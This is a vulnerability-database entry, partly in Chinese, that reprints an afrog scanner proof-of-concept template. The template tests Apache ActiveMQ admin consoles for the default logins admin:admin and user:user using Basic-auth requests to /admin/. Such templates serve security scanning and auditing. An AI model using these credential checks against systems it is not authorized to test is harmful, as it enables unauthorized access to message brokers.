activemq-default-password: ActiveMQ Default Password

日期: 2025-09-01 | 影响软件: ActiveMQ | POC: 已公开

漏洞描述

Apache ActiveMQ default login information was discovered.

PoC代码[已公开]

id: activemq-default-password

info:
    name: ActiveMQ Default Password
    author: pa55w0rd
    severity: high
    verified: true 
    description: |
        Apache ActiveMQ default login information was discovered.
    reference:
        - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html
    tags: apache,activemq,default-login

set:
    admin: "base64('admin:admin')"
    user: "base64('user:user')"
rules:
    r0:
        request:
            method: GET
            path: /admin/
            headers:
                Authorization: Basic {{admin}}
        expression: |
            response.status == 200 && 
            response.body.ibcontains(b"Welcome to the Apache ActiveMQ Console of") && 
            response.body.bcontains(b"<h2>Broker</h2>")
    r1:
        request:
            method: GET
            path: /admin/
            headers:
                Authorization: Basic {{user}}
        expression: |
            response.status == 200 && 
            response.body.ibcontains(b"Welcome to the Apache ActiveMQ Console of") && 
            response.body.bcontains(b"<h2>Broker</h2>")
expression: r0() || r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/activemq-default-password.yaml

相关漏洞推荐